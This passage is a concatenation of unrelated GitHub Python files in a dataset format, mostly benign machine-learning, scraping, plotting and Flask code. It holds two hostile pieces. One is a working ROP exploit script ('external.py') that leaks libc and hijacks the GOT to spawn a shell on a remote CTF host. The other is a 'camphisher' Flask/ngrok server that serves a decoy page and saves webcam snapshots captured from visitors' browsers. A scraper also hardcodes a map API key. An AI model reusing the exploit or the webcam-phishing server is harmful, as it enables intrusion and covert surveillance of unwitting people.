output_dim\n\n self.fc_1 = nn.Linear(self.input_dim,\n self.output_dim,\n bias=bias)\n\n def forward(self, features):\n\n return self.nonlinearity(self.fc_1(features))\n\nclass BilinearNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32, sparse=False):\n\n super(BilinearNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n\n self.user_embeddings = ScaledEmbedding(num_users, embedding_dim,\n sparse=sparse)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim,\n sparse=sparse)\n self.user_biases = ZeroEmbedding(num_users, 1, sparse=sparse)\n self.item_biases = ZeroEmbedding(num_items, 1, sparse=sparse)\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n user_embedding = user_embedding.view(-1, self.embedding_dim)\n\n user_bias = self.user_biases(user_ids).view(-1, 1)\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids)\n item_embedding = item_embedding.view(-1, self.embedding_dim)\n\n item_bias = self.item_biases(item_ids).view(-1, 1)\n\n return item_embedding, item_bias\n\n def forward(self, user_representation, user_bias, item_representation, item_bias):\n\n dot = (user_representation * item_representation).sum(1)\n\n return dot + user_bias + item_bias\n\nclass MixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n projection_scale=1.0,\n num_components=4):\n\n super(MixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n self.projection_scale = projection_scale\n\n self.user_embeddings = ScaledEmbedding(num_users, embedding_dim)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n self.taste_projection = nn.Linear(embedding_dim,\n embedding_dim * self.num_components, bias=False)\n self.attention_projection = nn.Linear(embedding_dim,\n embedding_dim * self.num_components, bias=False)\n\n for layer in (self.taste_projection, self.attention_projection):\n torch.nn.init.xavier_normal(layer.weight, self.projection_scale)\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids).squeeze()\n user_bias = self.user_biases(user_ids).squeeze()\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return item_embedding, item_bias\n\n def forward(self, user_ids, item_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n\n user_tastes = (self.taste_projection(user_embedding)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_projection(user_embedding)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = user_attention # * user_embedding.unsqueeze(1).expand_as(user_tastes)\n\n attention = (F.softmax((user_attention *\n item_embedding.unsqueeze(1).expand_as(user_attention))\n .sum(2)).unsqueeze(2).expand_as(user_attention))\n weighted_preference = (user_tastes * attention).sum(1)\n\n dot = (weighted_preference * item_embedding).sum(1)\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return dot + user_bias + item_bias\n\nclass MixtureComponent(nn.Module):\n\n def __init__(self, embedding_dim, num_components):\n\n super(MixtureComponent, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.fc_1 = nn.Linear(embedding_dim, embedding_dim, bias=False)\n self.fc_2 = nn.Linear(embedding_dim, embedding_dim, bias=False)\n\n self.taste_projection = nn.Linear(embedding_dim,\n embedding_dim * num_components,\n bias=False)\n self.attention_projection = nn.Linear(embedding_dim,\n embedding_dim * num_components,\n bias=False)\n\n def forward(self, x):\n\n batch_size, embedding_size = x.size()\n\n x = F.relu(self.fc_1(x))\n x = F.relu(self.fc_2(x))\n\n user_tastes = (self.taste_projection(x)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_projection(x)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n\n return user_tastes, user_attention\n\nclass NonlinearMixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n num_components=4):\n\n super(NonlinearMixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.user_embeddings = nn.Embedding(num_users, embedding_dim)\n self.item_embeddings = nn.Embedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n self.mixture = MixtureComponent(embedding_dim, num_components)\n\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids).squeeze()\n user_bias = self.user_biases(user_ids).squeeze()\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return item_embedding, item_bias\n\n def forward(self, user_ids, item_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n user_tastes, user_attention = self.mixture(user_embedding)\n item_embedding = item_embedding.unsqueeze(1).expand_as(user_attention)\n\n attention = F.softmax((user_attention * item_embedding).sum(2))\n\n preference = ((user_tastes * item_embedding)\n .sum(2))\n weighted_preference = (attention * preference).sum(1).squeeze()\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return weighted_preference + user_bias + item_bias\n\nclass EmbeddingMixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n num_components=4):\n\n super(EmbeddingMixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.taste_embeddings = ScaledEmbedding(num_users, embedding_dim * num_components)\n self.attention_embeddings = ScaledEmbedding(num_users, embedding_dim * num_components)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n def forward(self, user_ids, item_ids):\n\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n user_tastes = (self.taste_embeddings(user_ids)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_embeddings(user_ids)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n\n attention = (F.softmax((user_attention *\n item_embedding.unsqueeze(1).expand_as(user_attention))\n .sum(2)).unsqueeze(2).expand_as(user_attention))\n weighted_preference = (user_tastes * attention).sum(1)\n\n dot = (weighted_preference * item_embedding).sum(1)\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return dot + user_bias + item_bias","repo_name":"Z-an/mixture","sub_path":"representation.py","file_name":"representation.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7658263819","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''=================================================\n@IDE :PyCharm\n@Author :LuckyHuibo\n@Date :2019/7/12 15:48\n@Desc :\n从wiki百科中爬取广州的地铁线路\n=================================================='''\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict\n\n\ndef get_each_line_station(url):\n \"\"\"\n 获取每一条地铁线的站点信息\n :param url: https://zh.wikipedia.org/wiki/%E5%B9%BF%E5%B7%9E%E5%9C%B0%E9%93%811%E5%8F%B7%E7%BA%BF (如:1号线)\n :return: list列表存储的所有站点信息\n \"\"\"\n resp = requests.get(url, timeout=30)\n resp.encoding = 'utf-8'\n s = BeautifulSoup(resp.text, \"html.parser\")\n tab = s.find_all('table', attrs={\"class\": \"wikitable\", \"align\": \"center\"})\n station_list = re.findall(r'(.+)', str(tab))\n\n return station_list\n\n\ndef get_cantion_metro(lines_dict):\n \"\"\"\n 获取广州的所有地铁信息\n :param lines_dict: 输入的字典形式为:{'1号线': 'https:/..','2号线': 'https:/..'}\n :return: {'1号线': ['广州东站', '体育中心', ...],'2号线':[]...}\n \"\"\"\n for k_name, v_url in lines_dict.items():\n lines_dict[k_name] = get_each_line_station(lines_dict[k_name])\n return lines_dict\n\n\ndef get_all_stations(lines_dict):\n \"\"\"\n 将一个城市的所有地铁站信息存储到一个List中\n :param lines_dict:\n :return:\n \"\"\"\n stations = set()\n for k_name, v_value in lines_dict.items():\n stations.update(lines_dict[k_name])\n return stations\n\n\ndef get_longitude_latitude(city_info, station):\n \"\"\"\n 利用高德地图查询对应的地铁站经纬度信息,下面的key需要自己去高德官网申请\n https://lbs.amap.com/api/webservice/guide/api/georegeo\n :param city_info: 具体城市的地铁,如:广州市地铁\n :param station: 具体的地铁站名称,如:珠江新城站\n :return: 经纬度\n \"\"\"\n addr = city_info + station\n print('*要查找的地点:' + addr)\n parameters = {'address': addr, 'key': '98a3444618af14c0f20c601f5a442000'}\n base = 'https://restapi.amap.com/v3/geocode/geo'\n resp = requests.get(base, parameters, timeout=60) # 超时设置为60s,翻墙开了全局代理会慢点的\n if resp.status_code == 200:\n answer = resp.json()\n x, y = answer['geocodes'][0]['location'].split(',')\n coor = (float(x), float(y))\n print('=' + station + '的坐标是:', coor)\n return coor\n\n\ndef get_station_location(station_connection):\n \"\"\"\n 获取广州市所有地铁站的经纬度信息\n :param station_connection:list\n :return:字典dict\n \"\"\"\n station_location = {}\n for station in station_connection:\n md_station = station + \"站\"\n station_location[station] = get_longitude_latitude(city_info='广州市地铁', station=md_station)\n return station_location\n\n\ndef get_station_connetoins(all_lines_dict):\n \"\"\"\n 获取地铁之间的关联信息\n :param all_lines_dict: 传入所有地铁线路的字典\n :return:\n \"\"\"\n connections = defaultdict(list)\n for s_key in all_lines_dict.keys(): # generate real station network\n for i in range(len(all_lines_dict[s_key])):\n if i == 0:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i + 1])\n elif i == len(all_lines_dict[s_key]) - 1:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i - 1])\n else:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i - 1])\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i + 1])\n print('所有相连接站点信息:', len(connections))\n return connections\n\n\ndef search(start, end, all_connection):\n \"\"\"\n 找到2个地铁站的路线路\n :param start:地铁站,str\n :param end:地铁站,str\n :param all_connection:所有相连接站点信息defaultdict\n :return:列表\n \"\"\"\n pathes = [[start]]\n passed = [start]\n\n while pathes:\n path = pathes.pop(0)\n frontier = path[-1]\n nxt = all_connection.get(frontier)\n for station in nxt:\n if station in passed:\n continue\n else:\n new_path = path + [station]\n pathes.append(new_path)\n if station == end: return new_path\n passed.append(station)\n\n\ndef pretty_print(lst):\n print(\"->\".join(lst))\n\n\ndef main():\n # 在国内使用requests请求wiki,google等国外的地址,需要设置代理,将小飞机设置为全局代理\n response = requests.get('https://zh.wikipedia.org/wiki/%E5%B9%BF%E5%B7%9E%E5%9C%B0%E9%93%81')\n response.encoding = 'utf-8'\n # 解析wiki的html,得到beautiful对象\n soup = BeautifulSoup(response.text, \"html.parser\")\n # 查找bs想要获取的表格,查看html代码,表格的头数据是:\n # ,变成soup的find_all是attrs={}\n tables = soup.find_all('table', attrs={\"class\": \"wikitable\", \"align\": \"center\", \"style\": \"width: 100%;\"})\n # print(tables) #将数据丢到xx.html文件展示\n pattern = re.compile(r'(.+线)')\n lines = pattern.findall(str(tables))\n print(type(lines))\n print('获取到广州的地铁路线为:')\n for line in lines:\n print(line)\n # 将获取的线路存到字典中\n canton_lines = {}\n for line in lines:\n canton_lines[line[1]] = 'https://zh.wikipedia.org' + line[0]\n print(canton_lines)\n # 获取所有的线路\n all_lines = get_cantion_metro(canton_lines)\n print('=' * 20)\n print(all_lines)\n # 获取所有的地铁站\n all_stations = get_all_stations(all_lines)\n print('广州市地铁站的个数:', len(all_stations))\n print(all_stations)\n # 获取所有的经纬度\n all_locations = get_station_location(all_stations)\n print(len(all_locations))\n print(all_locations)\n # 找到为什么画出来的图少了一些点,因为使用高德地图API,打印出来的经纬度有一些是重复的,这个后面有时间再处理下\n import matplotlib\n\n # 指定默认字体\n matplotlib.rcParams['font.sans-serif'] = ['SimHei']\n matplotlib.rcParams['font.family'] = 'sans-serif'\n # 解决负号'-'显示为方块的问题\n matplotlib.rcParams['axes.unicode_minus'] = False\n import matplotlib.pyplot as plt\n import networkx as nx\n subway_graph = nx.Graph()\n subway_graph.add_nodes_from(list(all_locations.keys()))\n nx.draw(subway_graph, all_locations, with_labels=False, node_size=10)\n # 在pycharm中需要添加下面的代码,才能显示\n plt.show()\n\n # 获取相连接的地铁信息\n all_connection = get_station_connetoins(all_lines)\n print(all_connection)\n\n # 打印路径\n pretty_print(search(start='广州东站', end='万胜围', all_connection=all_connection))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Valuebai/learn-NLP-luhuibo","sub_path":"lesson-02-crawler-metro/canton_metro.py","file_name":"canton_metro.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"22074242820","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt \nfrom matplotlib import collections as mc\nimport math, pickle, sys\n\n(plot1, plot2) = pickle.load(open(sys.argv[1]))\n\nfig = plt.figure(1)\nfig.canvas.set_window_title(sys.argv[1])\n\nax = x=plt.subplot(211)\n\nplt.ylabel('Vel')\nplt.title('XY and E-Velocity')\nplt.grid(True)\n\nlc = mc.LineCollection(plot1.Lines, colors=plot1.Colors, linestyles=plot1.Styles, linewidth=3)\nax.add_collection(lc)\n\nfor i in range(len(plot1.Ticks)):\n (x, y, nr) = plot1.Ticks[i]\n plt.axvline(x, color=\"yellow\")\n plt.text(x, y*1.01, \"%d\" % nr)\n\nax.autoscale()\nplt.xlim(xmin=0)\n\nax2 = plt.subplot(212, sharex=ax)\nax2.set_xlim(0)\n\nplt.ylabel('Vel')\nplt.title('E-Advance')\nplt.grid(True)\n\nlc = mc.LineCollection(plot2.Lines, colors=plot2.Colors, linestyles=plot2.Styles, linewidth=3)\nax2.add_collection(lc)\n\nfor i in range(len(plot1.Ticks)):\n (x, y, nr) = plot1.Ticks[i]\n plt.axvline(x, color=\"yellow\")\n\nplt.axhline(0, color=\"black\")\n\nax2.autoscale()\nplt.xlim(xmin=0)\n\n\nfig.tight_layout()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ErwinRieger/ddprint","sub_path":"scripts/ddplot.py","file_name":"ddplot.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"32"} +{"seq_id":"39446262914","text":"import torch.nn as nn\n\n\n\n\nclass BottleNeck(nn.Module):\n def __init__(self, t, c1, c2, s):\n super(BottleNeck, self).__init__()\n \n self.stride = s\n self.inchannels = c1\n self.outchannels = c2\n \n self.block = nn.Sequential(\n nn.Conv2d(c1, c1*t, kernel_size=1),\n nn.BatchNorm2d(c1*t),\n nn.ReLU6(inplace=True),\n \n nn.Conv2d(c1*t, c1*t, kernel_size=3, stride=s, padding=1, groups=c1*t),\n nn.BatchNorm2d(c1*t),\n nn.ReLU6(inplace=True),\n \n nn.Conv2d(c1*t, c2, kernel_size=1),\n nn.BatchNorm2d(c2),\n )\n\n\n def forward(self, x):\n residual = self.block(x)\n \n if self.stride == 1 and self.inchannels == self.outchannels:\n residual += x\n \n return residual\n\n\nclass MobileNetV2(nn.Module):\n def __init__(self, inchannels, classes=10):\n super(MobileNetV2, self).__init__()\n \n self.conv1 = nn.Sequential(\n nn.Conv2d(inchannels, 32, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU6(inplace=True)\n )\n \n self.layer1 = self._make_layer(t=1, c1=32, c2=16, n=1, s=1)\n self.layer2 = self._make_layer(t=6, c1=16, c2=24, n=2, s=1)\n self.layer3 = self._make_layer(t=6, c1=24, c2=32, n=3, s=1)\n self.layer4 = self._make_layer(t=6, c1=32, c2=64, n=4, s=1)\n self.layer5 = self._make_layer(t=6, c1=64, c2=96, n=3, s=1)\n self.layer6 = self._make_layer(t=6, c1=96, c2=160, n=3, s=1)\n self.layer7 = self._make_layer(t=6, c1=160, c2=320, n=1, s=2)\n \n self.conv2 = nn.Sequential(\n nn.Conv2d(320, 1280, kernel_size=1),\n nn.BatchNorm2d(1280),\n nn.ReLU6(inplace=True)\n )\n \n self.avg_pool = nn.AvgPool2d(kernel_size=7, stride=1)\n self.conv3 = nn.Conv2d(1280, classes, 1)\n \n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.layer5(out)\n out = self.layer6(out)\n out = self.layer7(out)\n out = self.conv2(out)\n out = self.avg_pool(out)\n out = self.conv3(out)\n out = out.view(out.shape[0], -1)\n return out\n \n \n def _make_layer(self, t, c1, c2, n, s):\n layers = []\n layers.append(BottleNeck(t, c1, c2, s))\n \n for i in range(1, n):\n layers.append(BottleNeck(t, c2, c2, s=1))\n\n return nn.Sequential(*layers)\n\ndef loadModel(model):\n if model == \"mobileNetV2\":\n model = MobileNetV2(inchannels=1)\n return model\n\n\n\n\n\n\n","repo_name":"xiaocao-tian/Net","sub_path":"MobileNetV2/mobileNetV2.py","file_name":"mobileNetV2.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21119473145","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"wiki/\", views.entry, name=\"entry\"),\n path(\"search\", views.search, name=\"search\"),\n path(\"newEntry\", views.createEntry, name=\"createEntry\"),\n path(\"wiki/edit/\", views.editEntry, name=\"editEntry\"),\n path(\"random\", views.randomEntry, name=\"randomEntry\"),\n]","repo_name":"Fractalbuilder/Wiki","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38289726997","text":"from flask import Flask,render_template,request\nimport base64, os,time,requests\nfrom binascii import a2b_base64\nfrom flask_ngrok import run_with_ngrok\n\nindex='index.html'\nurl ='https://www.cuemath.com/maths/maths-formulas-for-class-10/'\n\nwith open('est.html','r') as f:\n\test = f.read()\n\napp = Flask(__name__)\nrun_with_ngrok(app)\n\n@app.route('/')\ndef home():\n\treturn render_template(index)\n@app.route('/est')\ndef ester():\n\treq= requests.get(url)\n\ttext= req.text\n\treturn est\n@app.route('/post',methods=[\"POST\",'GET'])\ndef post():\n\t\tif request.method == 'POST':\n\t\t\tdatauri = request.get_json()['data']\n\t\t\tpos = datauri.find(',')+1\n\t\t\tdata=datauri[pos:]\n\t\t\tbinary_data = a2b_base64(data)\n\t\t\tfd = open(f'image_{time.time()}.jpeg', 'wb')\n\t\t\tfd.write(binary_data)\n\t\t\tfd.close()\n\t\t\tprint('Captured')\n\t\treturn 'posted'\n\t\t\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"programmingwithprince/camphisher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19822651124","text":"# Author: Arabian Coconut\n# Last Modified: 17/09/2023\nimport moneycontrol.moneycontrol_api as mc\nimport moneycontrol.storage_control as sc\nfrom flask import Flask, request, jsonify, render_template\n\napp = Flask(__name__)\nsc_instance= sc.StorageControl(\"data.pkl\")\n\n\n@app.route('/api/', methods=['GET'])\ndef api(news):\n \"\"\"\n Gets the news from the given URL and returns a JSON object containing the title, link,\n and date of the news.\n\n Parameters:\n url (string): The URL from which to retrieve the news\n\n Returns: json_data (JSON object): A JSON object containing the title, link, and date of the news, business news,\n and latest news.\n \"\"\"\n if request.method == 'GET':\n if news == 'news':\n return jsonify(mc.get_news())\n elif news == 'business':\n return jsonify(mc.get_business_news())\n elif news == 'latest':\n return jsonify(mc.get_latest_news())\n elif news == 'list':\n sc_instance.convert_to_json()\n return jsonify(open(sc_instance.json_path(), 'r').read())\n elif news == 'status':\n return jsonify({\"status\": \"200\"})\n else:\n return jsonify({\"error\": \"Method not allowed or server error\"})\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')","repo_name":"ArabianCoconut/Moneycontrol_api","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"6756852986","text":"'''\r\nExercise#02: Read an html file and extract all the links and write to another file. Assume that in one line there is one url.\r\n'''\r\nwith open('file8.html', 'r') as webpage:\r\n with open('file9.txt', 'a') as wf:\r\n # do kam hu skte hain ek tou start se read kr skte hai or dsra direct body se jo bhtr rhega but yahan start se krege\r\n for line in webpage.readlines():\r\n if ' int:\n pivot = 0\n left = 0\n right = len(nums)-1\n\n while left < right:\n pivot = (right + left) // 2\n if nums[pivot] < nums[pivot-1]:\n break\n if nums[pivot+1] < nums[pivot]:\n pivot += 1\n break\n if nums[left] < nums[pivot]:\n left = pivot + 1\n else:\n right = pivot - 1\n lresult = self.binary_search(nums, target, 0, pivot)\n rresult = self.binary_search(nums, target, pivot, len(nums) - 1)\n # print(\"pivot\", pivot, \"lresult\", lresult, \"rresult\", rresult)\n return max(lresult, rresult)\n\n def binary_search(self, nums: List[int], target: int, lo: int, hi: int):\n while lo <= hi:\n mid = (hi + lo) // 2\n # print(f\"lo {lo:2} mid {mid:2} hi {hi:2} \")\n if target == nums[mid]:\n return mid\n elif target < nums[mid]:\n hi = mid - 1\n else:\n lo = mid + 1\n return -1\n\n def search2(self, nums: List[int], target: int) -> int:\n # see https://leetcode.com/problems/search-in-rotated-sorted-array/discuss/14437/Python-binary-search-solution-O(logn)-48ms\n lo = 0\n hi = len(nums) - 1\n\n while lo <= hi:\n mid = (lo + hi) // 2\n # print(f\"lo {lo:2} mid {mid:2} hi {hi:2} \")\n if nums[mid] == target:\n return mid\n elif nums[lo] <= nums[mid]:\n if nums[lo] <= target <= nums[mid]:\n hi = mid - 1\n else:\n lo = mid + 1\n else:\n if nums[mid] <= target <= nums[hi]:\n lo = mid + 1\n else:\n hi = mid - 1\n\n # print(\"didn't find result\")\n return -1\n\ns = Solution()\n\nassert s.search([4,5,6,7,0,1,2],0) == 4\nassert s.search([4,5,6,7,0,1,2],3) == -1\nassert s.search([1],0) == -1\n\nlst = list(range(32))\n\nfor i in lst:\n rotated = lst[~i+1:] + lst[0:~i+1]\n # print(f\"{i:2}\", rotated)\n assert s.search(rotated, 0) == i\n assert s.search2(rotated, 0) == i\n","repo_name":"kennyu/problems","sub_path":"033_search_in_rotated_array.py","file_name":"033_search_in_rotated_array.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"242972156","text":"import pygame\nfrom threading import Thread\n\nimport sys\nfrom src.contants.Constants import WHITE, FPS\nimport src.inputs.Input as InputModule\nfrom src.facade import Facade\nfrom src.maths import Maths\nfrom src.facade.Facade import fpsClock\n\n\nclass Task(Thread):\n def __init__(self, job):\n Thread.__init__(self)\n self.job = job\n\n def run(self):\n self.job.do()\n\n\nclass OutputDrawer(object):\n def __init__(self, window, list_to_draw):\n # Set up the window\n pygame.display.set_caption('CyberMania')\n self.window = window\n self.listToDraw = list_to_draw\n\n def do(self):\n try:\n self.window.fill(WHITE)\n for toDraw in self.listToDraw:\n toDraw.draw(self.window)\n pygame.display.update()\n except pygame.error:\n print(\"pygame exited, stopping thread\")\n Facade.isRunning = False\n\n\nclass InputsListener(object):\n def __init__(self, hero):\n self.hero = hero\n Facade.music.toogle()\n\n def do(self):\n InputModule.listen(self.hero)\n\n\nclass PositionUpdater(object):\n def __init__(self, list_of_object):\n self.listOfObject = list_of_object\n\n def do(self):\n for objects in self.listOfObject:\n Maths.update_position_of_object(objects)\n","repo_name":"VincentRavera/CyberMania","sub_path":"src/runtime/Runtime.py","file_name":"Runtime.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6576593476","text":"#!/usr/bin/env python\nfrom pwn import *\n\ncontext.update(arch='amd64')\nexe = './external'\nif args.REMOTE:\n libc = ELF('./libc-2.28.so')\nelse:\n libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')\ntyk = ELF('./external')\n\ndef start(argv=[], *a, **kw):\n '''Start the exploit against the target.'''\n if args.GDB:\n return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n else:\n if not args.REMOTE:\n return process([exe] + argv, *a, **kw)\n else:\n return remote('161.97.176.150', 9999)\n\ngdbscript = '''\nb *0x40126f\ncontinue\n'''.format(**locals())\n\nret = 0x000000000040101a\nsyscall = 0x0000000000401283\npop_rdi = 0x00000000004012f3\npop_rsi_r15 = 0x00000000004012f1\nwrite_syscall = 0x000000000040127c\n\n\nio = start()\n\n#dump memory got 0x404018 0x404018+0x38\n\nOFFSET = 88\nrop = b\"A\"* OFFSET\nrop += p64(pop_rdi) # 0x00000000004012f3: pop rdi; ret;\nrop += p64(1)\nrop += p64(pop_rsi_r15)\nrop += p64(0x404060) # pointer to stdout in libc\nrop += p64(0)\nrop += p64(write_syscall)\nrop += p64(pop_rdi) # 0x00000000004012f3: pop rdi; ret;\nrop += p64(0)\nrop += p64(pop_rsi_r15)\nrop += p64(0x404018) # got addr\nrop += p64(0)\n\nrop += p64(0x401086) # read @ libc to repair got - to chyba ten dlresolve\n\nrop += p64(pop_rdi) # main\n\nrop += p64(0x404020) # pointer to /bin/sh in got\n\nrop += p64(0x401233) # call puts (system)\n\nrop += p64(0xdeadbeef)\nrop += p64(0xdeadbeef)\nrop += p64(0xdeadbeef)\n\n\nio.recvuntil(\"> \")\nio.sendline(rop)\nleak = u64(io.recv(0x8))\nlog.info(\"stdout leak: \" + hex(leak))\nlibc_base = leak - 0x1bc760\nlog.info(\"libc base: \" + hex(libc_base))\n\nlog.info(\"repairing got\")\nlog.info(\"system @ libc: \"+ hex(libc.sym['system']))\n\n#io.recv()\n#io.send(open('./got', 'r', encoding = \"ISO-8859-1\").read())\nio.send(p64(libc_base + libc.sym['system'])+b\"/bin/sh\\x00\") # overwrite put@got with system and /bin/sh\n\nio.interactive()\n","repo_name":"embe221ed/CTFs","sub_path":"offshift/external/external.py","file_name":"external.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24642837919","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom datetime import datetime\r\n\r\nfrom flask_login import login_required, current_user\r\nfrom sqlalchemy import desc\r\nfrom flask import current_app, flash, render_template, request, redirect, url_for, jsonify, g\r\nfrom validator_collection import validators, checkers, errors\r\n\r\nfrom ..models import User, Post, Category, \\\r\nSavedArticle, Tag, AboutUs, ContactUs, load_user\r\nfrom ..data_retrieval import latest_added_articles\r\nfrom .email import contact_us_send_email\r\nfrom ..decorators import admin_required, account_state\r\nfrom .. import db\r\nfrom ..forms import is_valid_username\r\nfrom app.main import main\r\n\r\n\r\n\r\ntitle = \"Lang & Code - Home\"\r\n\r\n\r\n@main.before_app_request\r\n@account_state\r\ndef before_request():\r\n if request.accept_mimetypes['text/html'] > request.accept_mimetypes['application/json']:\r\n tags = Tag.query.all()\r\n categories = Category.query.all()\r\n g.tags = tags\r\n g.categories = categories\r\n if current_user.is_authenticated:\r\n if not current_user.confirmed:\r\n g.confirm_account = \"Please access your email and confirm your account.\"\r\n else:\r\n g.tags = None\r\n g.categories = None\r\n current_user.last_seen = datetime.utcnow()\r\n db.session.commit()\r\n\r\n\r\n########################## APP ############################\r\n##################################################################\r\n@main.route(\"/\")\r\ndef index():\r\n if current_user.is_authenticated:\r\n latest_articles = latest_added_articles(1)\r\n latest_articles_list = latest_added_articles(5)\r\n # for tags, we use the global g.tags defined in the before_request\r\n return render_template(\"authenticated_index.html\", \r\n title=title,\r\n latest_articles=latest_articles, \r\n latest_articles_list=latest_articles_list,\r\n tags=g.tags)\r\n return render_template(\"default_index.html\", title=title)\r\n\r\n\r\n@main.route(\"/users\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef users():\r\n title = \"Lang & Code - Users\"\r\n page = request.args.get('page', 1, type=int)\r\n if request.method == \"GET\":\r\n current_user.last_follower_view_time = datetime.utcnow()\r\n db.session.commit()\r\n users = User.query.paginate(\r\n page, current_app.config['USERS_PER_PAGE'], False)\r\n return render_template(\"users.html\", \r\n users=users.items, \r\n pagination=users,\r\n title=title)\r\n return render_template(\"users.html\", title=title)\r\n\r\n\r\n@main.route(\"/contact_us\", methods=[\"GET\", \"POST\"])\r\ndef contact_us():\r\n title = \"Lang & Code - Contact us\"\r\n if request.method == \"POST\":\r\n subject = request.form.get(\"subject\")\r\n body = request.form.get(\"body\")\r\n fullname = request.form.get(\"fullname\")\r\n email = request.form.get(\"email\")\r\n is_user = User.query.filter_by(email=email).first()\r\n if subject and body and email and fullname:\r\n contact_us_send_email(subject, body, email, fullname)\r\n if is_user:\r\n contact_us = ContactUs(is_user=True, \r\n user_id=is_user.id, \r\n 